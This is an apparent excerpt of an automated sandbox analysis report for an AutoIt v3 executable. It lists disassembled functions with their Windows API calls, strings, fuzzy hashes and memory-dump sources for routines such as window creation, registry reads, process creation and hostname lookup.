Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab0de264ba8d5d53d97509758cb480727708b478deb11c9698da120cd8be99a0
Instruction ID: 26d21dbefa4ae0453d9c3e51e5c1f5d91ed36d47a9d6bef5be5f0d102190383a
Opcode Fuzzy Hash: ab0de264ba8d5d53d97509758cb480727708b478deb11c9698da120cd8be99a0
Instruction Fuzzy Hash: 8031AF711083009FD301EF94CC81AAFBBE9EFD9344F44092EF5C1862A1EB759A48DB92

Function 0103DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,01015222), ref: 0103DBCE
GetFileAttributesW.KERNEL32(?), ref: 0103DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0103DBEE
FindClose.KERNEL32(00000000), ref: 0103DBFA

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 5636fbe5babc33fd04b1c5df193f8701aa0757787e722d7b48f6947f3cc79c62
Instruction ID: a80e2ed19f3b0f52dad72d31fde7b219afd0fb06a1e6629289c2e7c363d68361
Opcode Fuzzy Hash: 5636fbe5babc33fd04b1c5df193f8701aa0757787e722d7b48f6947f3cc79c62
Instruction Fuzzy Hash: F7F0EC7043051597A2306BBC9D0D46A77AC9E41334B404742F8F5C10F0EBB5995447D5

Function 00FF4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(010028E9,?,00FF4CBE,010028E9,010988B8,0000000C,00FF4E15,010028E9,00000002,00000000,?,010028E9), ref: 00FF4D09
TerminateProcess.KERNEL32(00000000,?,00FF4CBE,010028E9,010988B8,0000000C,00FF4E15,010028E9,00000002,00000000,?,010028E9), ref: 00FF4D10
ExitProcess.KERNEL32 ref: 00FF4D22

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3d583b95afa7975b521004411a0061bb8632b6ec4b028626c8c94a5c0039d040
Instruction ID: dd3bd8d5f315e177d6ac8e20d6974adf0ad38c3c727fa31433ea9090adfb0977
Opcode Fuzzy Hash: 3d583b95afa7975b521004411a0061bb8632b6ec4b028626c8c94a5c0039d040
Instruction Fuzzy Hash: E4E0BF31400149AFEF216F54DE09A593F69FF45751F104014FD958A236DB3AED41DB40

Function 0102D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0102D28C

Strings

X64, xrefs: 0102D2A8

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 5f94aea65c0b685a248f10e8288d9915435c0d418f71aaff50318ace63582436
Instruction ID: 59a85cd1df27af151765ae17e854bbb383f90df89072e7b44d204ffd8565e3d5
Opcode Fuzzy Hash: 5f94aea65c0b685a248f10e8288d9915435c0d418f71aaff50318ace63582436
Instruction Fuzzy Hash: E9D0C9B580112DEADB90CA90D888DDDB37CBB15305F000151F146A2000D73495488F20

Function 0105AFF9 Relevance: 24.4, APIs: 16, Instructions: 418
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0105B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0105B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0105B1D4
_wcslen.LIBCMT ref: 0105B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0105B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0105B236
_wcslen.LIBCMT ref: 0105B332

Part of subcall function 010405A7: GetStdHandle.KERNEL32(000000F6), ref: 010405C6

_wcslen.LIBCMT ref: 0105B34B
_wcslen.LIBCMT ref: 0105B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0105B3B6
GetLastError.KERNEL32(00000000), ref: 0105B407
CloseHandle.KERNEL32(?), ref: 0105B439
CloseHandle.KERNEL32(00000000), ref: 0105B44A
CloseHandle.KERNEL32(00000000), ref: 0105B45C
CloseHandle.KERNEL32(00000000), ref: 0105B46E
CloseHandle.KERNEL32(?), ref: 0105B4E3

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: f7a2aeaf160fe05b00ed086de8771d95682ab3cc41b15ac89d3c4c7015a183cd
Instruction ID: e278f3b778e2b693059f0bca699bd4089db9f516256ab12c1244da96791a6096
Opcode Fuzzy Hash: f7a2aeaf160fe05b00ed086de8771d95682ab3cc41b15ac89d3c4c7015a183cd
Instruction Fuzzy Hash: B2F19D716043409FD764EF28C881B6FBBE6AF85310F18855EF9D59B2A2DB35E804CB52

Function 00FDD730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00FDD807
timeGetTime.WINMM ref: 00FDDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FDDB28
TranslateMessage.USER32(?), ref: 00FDDB7B
DispatchMessageW.USER32(?), ref: 00FDDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FDDB9F
Sleep.KERNEL32(0000000A), ref: 00FDDBB1

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 1227b7cdd25bfebe1be76f46a6242d32c9cb2a054a23ef3c526fee7d16e2e158
Instruction ID: 1de6216cec3ae3ca10fdb80e23ff6325f78efa3a025fc81343fa39cfd9737e23
Opcode Fuzzy Hash: 1227b7cdd25bfebe1be76f46a6242d32c9cb2a054a23ef3c526fee7d16e2e158
Instruction Fuzzy Hash: AA421330608342DFD739DF24C894BAABBE2BF85314F18855AE4D587391D775E844EB82

Function 00FD2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FD2D07
RegisterClassExW.USER32(00000030), ref: 00FD2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD2D42
InitCommonControlsEx.COMCTL32(?), ref: 00FD2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD2D6F
LoadIconW.USER32(000000A9), ref: 00FD2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD2D94

Strings

0, xrefs: 00FD2CE9
AutoIt v3 GUI, xrefs: 00FD2D23
TaskbarCreated, xrefs: 00FD2D37
+, xrefs: 00FD2CF0

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: aca0c8aabbff89e1949a99ae1d8d67146aae8cec6e182723749481d1882e86f7
Instruction ID: c3f78532a1c807ba05fda7af368226b56545a90e939e9de83918291335868e68
Opcode Fuzzy Hash: aca0c8aabbff89e1949a99ae1d8d67146aae8cec6e182723749481d1882e86f7
Instruction Fuzzy Hash: 632117B5D01358AFEB20DFA4E949BDDBBB8FB08700F00811AF591A6294D7BA0544CF91

Function 0101065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0101039A: CreateFileW.KERNEL32(00000000,00000000,?,01010704,?,?,00000000,?,01010704,00000000,0000000C), ref: 010103B7

GetLastError.KERNEL32 ref: 0101076F
__dosmaperr.LIBCMT ref: 01010776
GetFileType.KERNEL32(00000000), ref: 01010782
GetLastError.KERNEL32 ref: 0101078C
__dosmaperr.LIBCMT ref: 01010795
CloseHandle.KERNEL32(00000000), ref: 010107B5
CloseHandle.KERNEL32(?), ref: 010108FF
GetLastError.KERNEL32 ref: 01010931
__dosmaperr.LIBCMT ref: 01010938

Strings

H, xrefs: 010108BD

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 864f4027594d7c233ab582dc9384d7fb6ab44ab8f9fee991661cc61ae74a9492
Instruction ID: c046e7d17304479e691a7d271609d77846a4ff5abb0683aa099704938a0cfe78
Opcode Fuzzy Hash: 864f4027594d7c233ab582dc9384d7fb6ab44ab8f9fee991661cc61ae74a9492
Instruction Fuzzy Hash: 99A13832A041098FDF19EF68D851BAE3BE0AF06324F14419DF8D5EB2D9D7398952CB91

Function 00FD344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FD3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010A1418,?,00FD2E7F,?,?,?,00000000), ref: 00FD3A78

Part of subcall function 00FD3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FD3379

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FD356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0101318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 010131CE
RegCloseKey.ADVAPI32(?), ref: 01013210
_wcslen.LIBCMT ref: 01013277
_wcslen.LIBCMT ref: 01013286

Strings

Include, xrefs: 01013184, 010131C5
Software\AutoIt v3\AutoIt, xrefs: 00FD3560
\Include\, xrefs: 00FD3527
\, xrefs: 0101328C

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: e8be8cadc0e15fa8316e335c94fc55e14b9197216e1c1edde56598dc63697f23
Instruction ID: 18256a687bb4a9c0a6c31cf53867051ef4c9a8c7b127a713bc0eed05d661d3c7
Opcode Fuzzy Hash: e8be8cadc0e15fa8316e335c94fc55e14b9197216e1c1edde56598dc63697f23
Instruction Fuzzy Hash: 9971E4724043019ED324EF69DC818ABBBE8FF86750F84843EF5C497264EB7A9548DB52

Function 00FD2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FD2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00FD2B9D
LoadIconW.USER32(00000063), ref: 00FD2BB3
LoadIconW.USER32(000000A4), ref: 00FD2BC5
LoadIconW.USER32(000000A2), ref: 00FD2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FD2BEF
RegisterClassExW.USER32(?), ref: 00FD2C40

Part of subcall function 00FD2CD4: GetSysColorBrush.USER32(0000000F), ref: 00FD2D07
Part of subcall function 00FD2CD4: RegisterClassExW.USER32(00000030), ref: 00FD2D31
Part of subcall function 00FD2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD2D42
Part of subcall function 00FD2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00FD2D5F
Part of subcall function 00FD2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD2D6F
Part of subcall function 00FD2CD4: LoadIconW.USER32(000000A9), ref: 00FD2D85
Part of subcall function 00FD2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD2D94

Strings

AutoIt v3, xrefs: 00FD2C2F
0, xrefs: 00FD2C0F
#, xrefs: 00FD2C16

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5748b6c0cb35e84f66f941b2b17884b6edcc36b79a2f7e64fb8855132e563b45
Instruction ID: db43bd0a8cc39adac1eed36ab4823e4ee7809fb39f5c15c2a3acca650c6475ba
Opcode Fuzzy Hash: 5748b6c0cb35e84f66f941b2b17884b6edcc36b79a2f7e64fb8855132e563b45
Instruction Fuzzy Hash: AA218E76E00314AFDB209FA5E944B9D7FF5FB08B50F40801AF584A2394D3BA0540DF90

Function 00FD3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00FD316A,?,?), ref: 00FD31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,00FD316A,?,?), ref: 00FD3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FD3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00FD316A,?,?), ref: 00FD3232
CreatePopupMenu.USER32 ref: 00FD3246
PostQuitMessage.USER32(00000000), ref: 00FD3267

Strings

TaskbarCreated, xrefs: 00FD322D

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 6b42adb1cca3b0619181d350784f2b1deb21efde430a45d25725036bfb6fb31f
Instruction ID: b44e235fa34e885523597182ec83334bbf163cb4746656d8545beef21e235f4c
Opcode Fuzzy Hash: 6b42adb1cca3b0619181d350784f2b1deb21efde430a45d25725036bfb6fb31f
Instruction Fuzzy Hash: 6941E437A00201AAEB246FB8DD09B793A5AF705351F5C411BF7D2C6395CA7E9A40B362

Function 00FD1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FD1459
CoUninitialize.COMBASE ref: 00FD14F8
UnregisterHotKey.USER32(?), ref: 00FD16DD
DestroyWindow.USER32(?), ref: 010124B9
FreeLibrary.KERNEL32(?), ref: 0101251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0101254B

Strings

close all, xrefs: 00FD1454

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 54526521eae43832bdf87131e17ea44cc07ad47ee0ab5c2f35fa076c32d016d3
Instruction ID: b29d196f10a7134eb2b10cb37aa3a24d4482faf95ff0c8e222f882915fb08ab3
Opcode Fuzzy Hash: 54526521eae43832bdf87131e17ea44cc07ad47ee0ab5c2f35fa076c32d016d3
Instruction Fuzzy Hash: DAD19931701212DFDB29EF15C998B28F7A5BF05700F2842AEE58A6B365CB34AC12DF50

Function 0103DE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 0103DE42
gethostname.WS2_32(?,00000100), ref: 0103DE5C
gethostbyname.WS2_32(?), ref: 0103DE69
inet_ntoa.WSOCK32(?), ref: 0103DEAB
_strcat.LIBCMT ref: 0103DEB9
WSACleanup.WSOCK32 ref: 0103DEDE

Strings

0.0.0.0, xrefs: 0103DE87

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 33e5fde0208e0115a0bcf5f07dc3e24c7a006faa1535d2cf2d6420bc484c92c8
Instruction ID: f711c625dbf6f77d18770f7f917eab48a5fdf8250dc5b23d13ce26937b52f386
Opcode Fuzzy Hash: 33e5fde0208e0115a0bcf5f07dc3e24c7a006faa1535d2cf2d6420bc484c92c8
Instruction Fuzzy Hash: 0D115931900109AFDB30BB64DC0AEEF3BACDF50710F4401AEF1C5960A1EFBA96819760

Function 00FD2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FD2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FD2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00FD1CAD,?), ref: 00FD2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00FD1CAD,?), ref: 00FD2CCF

Strings

AutoIt v3, xrefs: 00FD2C89, 00FD2C8E, 00FD2C8F
edit, xrefs: 00FD2CAC

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 6af094bf6a0cbca682249db23407bd25431b1b282bafe0ca61098e5037ad3c88
Instruction ID: a93a18b714e900f76310d983049d1f86ebff188efbb9c3ffd160354d1955f61a
Opcode Fuzzy Hash: 6af094bf6a0cbca682249db23407bd25431b1b282bafe0ca61098e5037ad3c88
Instruction Fuzzy Hash: 83F0DA765406A07AEB311B17AC0CE772EBDE7C6F60F40805EF980A6554C6BA1850DBB0

Function 00FD3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FD3B0F,SwapMouseButtons,00000004,?), ref: 00FD3B40
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FD3B0F,SwapMouseButtons,00000004,?), ref: 00FD3B61
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00FD3B0F,SwapMouseButtons,00000004,?), ref: 00FD3B83

Strings

Control Panel\Mouse, xrefs: 00FD3B3E

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 3eb3e8727deb137a3fa924c0ada26fcd4bdc96114e2067c6e751f1fc54e08ecf
Instruction ID: 39c419590c175170c2e9e2ae6e5a0efa0853f9fd37f2d10228e1dc9b1e5fdf20
Opcode Fuzzy Hash: 3eb3e8727deb137a3fa924c0ada26fcd4bdc96114e2067c6e751f1fc54e08ecf
Instruction Fuzzy Hash: B8115AB5510208FFEB208FA4DC44AAEB7B9EF41750B14446BF941D7214D2319F40A760

Function 0102D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0102D3BF
